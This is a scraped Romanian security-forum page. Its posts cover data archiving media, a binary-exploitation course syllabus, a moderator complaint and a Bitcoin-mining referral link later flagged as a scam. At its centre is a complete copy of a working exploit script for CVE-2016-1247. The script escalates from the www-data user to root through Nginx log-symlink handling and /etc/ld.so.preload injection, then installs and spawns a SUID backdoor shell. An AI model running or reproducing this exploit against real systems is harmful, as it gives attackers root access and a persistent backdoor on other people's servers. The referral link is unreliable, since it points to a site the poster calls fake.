USB-ul flash se deterioreaza ft repede. (mai ales sub radiatie). CD/DVD e o solutie buna insa citirea datelor necesita dioda laser si in instrument optic precis. Eu as merge pe banda magnetica pt o perioada scurta si DVD pt o perioada mai lunga. (nu HDD pt ca nu stiu dupa cum sa mai accesez file-systemul) Problema aici e ca datele(standardul in care sunt stocate) sa fie si usor de citit. As include in Banda magnetica si in DVD-uri scheme despre constructia unui DVD player, o copie linux, un compilator C, arhitectura unui Intel/ARM. Si multe carti de fizica, istorie, mate, chimie si informatica. Anyway toate informatiile astea ar putea fi descifrate dupa 2-3 generatii. Cand s-ar reconstrui generatoare, aparate radio etc. (Descoperirea fenomenelor electromagnetice, descifrarea benzii magnetice) Referinta: https://en.m.wikipedia.org/wiki/Voyager_Golden_Record1 point
-
Il invoc la apel pe tânărul caracter ezoteric @sandabot membru la Centrul de Aparare Ezoterica a Lumii Fizice a Planetei Eminesciana Impotriva Agresiunilor Civilizationale Extraterestre. Răspunsul este Glass Storage. The glass storage discs can hold a whopping 360 terabytes each, are stable at temperatures up to 1,000°C (1,832°F), and are expected to keep the data intact for 13.8 billion years at room temperature (anything up to 190°C, or 374°F). Mai multe detalii aici.1 point
-
1 point
-
1 point
-
1 point
-
Nginx (Debian-Based Distributions) - Local Privilege Escalation #!/bin/bash # # Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit # nginxed-root.sh (ver. 1.0) # # CVE-2016-1247 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # --- # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu # etc.) to escalate their privileges from nginx web server user (www-data) to root # through unsafe error log handling. # # The exploit waits for Nginx server to be restarted or receive a USR1 signal. # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx) # script which is called daily by the cron.daily on default installations. # The restart should take place at 6:25am which is when cron.daily executes. # Attackers can therefore get a root shell automatically in 24h at most without any admin # interaction just by letting the exploit run till 6:25am assuming that daily logrotation # has been configured. # # # Exploit usage: # ./nginxed-root.sh path_to_nginx_error.log # # To trigger logrotation for testing the exploit, you can run the following command: # # /usr/sbin/logrotate -vf /etc/logrotate.d/nginx # # See the full advisory for details at: # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # Video PoC: # https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/nginxrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Ctrl+C pressed" cleanexit 0 } #intro cat <<_eascii_ _______________________________ < Is your server (N)jinxed ? ;o > ------------------------------- \ \ __---__ _- /--______ __--( / \ )XXXXXXXXXXX\v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX\ /XXXXX( )--_ XXXXXXXXXXX\ /XXXXX/ ( O ) XXXXXX \XXXXX\ XXXXX/ / XXXXXX \__ \XXXXX XXXXXX__/ XXXXXX \__----> ---___ XXX__/ XXXXXX \__ / \- --__/ ___/\ XXXXXX / ___--/= \-\ ___/ XXXXXX '--- XXXXXX \-\/XXX\ XXXXXX /XXXXX \XXXXXXXXX \ /XXXXX/ \XXXXXX > _/XXXXX/ \XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- \XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV"" _eascii_ echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m" id | grep -q www-data if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi # [ Exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`" # Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered curl http://localhost/ >/dev/null 2>/dev/null # Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily # rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am) echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..." while :; do sleep 1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done # /etc/ld.so.preload should be owned by www-data user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" chmod 755 /etc/ld.so.preload # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo 2>/dev/null >/dev/null # Check for the rootshell ls -l $BACKDOORPATH ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi rm -f $ERRORLOG echo > $ERRORLOG # Use the rootshell to perform cleanup that requires root privilges $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" # Reset the logging to error.log $BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`" # Execute the rootshell echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -i # Job done. cleanexit 0 Sursa: https://www.exploit-db.com/exploits/40768/1 point
-
--[ Tools and Basic Reverse Engineering --[ Extended Reverse Engineering --[ Introduction to Memory Corruption --[ Shellcoding --[ Format Strings --[ DEP and ROP --[ Secure Systems and Game Console Exploitation --[ Address Space Layout Randomization --[ Heap Exploitation --[ Misc Concepts & Stack Canaries --[ C++ Concepts and Differences --[ Kernel Exploitation --[ Exploitation on 64bit, ARM, Windows --[ Automation & The Future of Exploitation http://security.cs.rpi.edu/courses/binexp-spring2015/1 point
-
Ba, Nytro pune de o ora tutoriale si voi va scarpinati dubios la maciuca cu threadurile de rahat. Thread closed. Chiar nu vedeti nimic interesant aici decat rahaturile astea ?1 point
-
Va puteti inregistra pe: ref: https://bitminer.io/538950 (ma ajutati si pe mine) non-ref https://bitminer.io Ca sa retragi trebuie sa ai 0.005 BTC pe care ii faci in 9 zile. 0.0006 * x = 0.005 x=0.005/0.0006 x=5/1000 * 6/10000 x=5*10/6 x=5/1*5/3 x=25/3 8.(3) sa zicem 9 zile... SITE FAKE || NU PLATESTE!!!!-1 points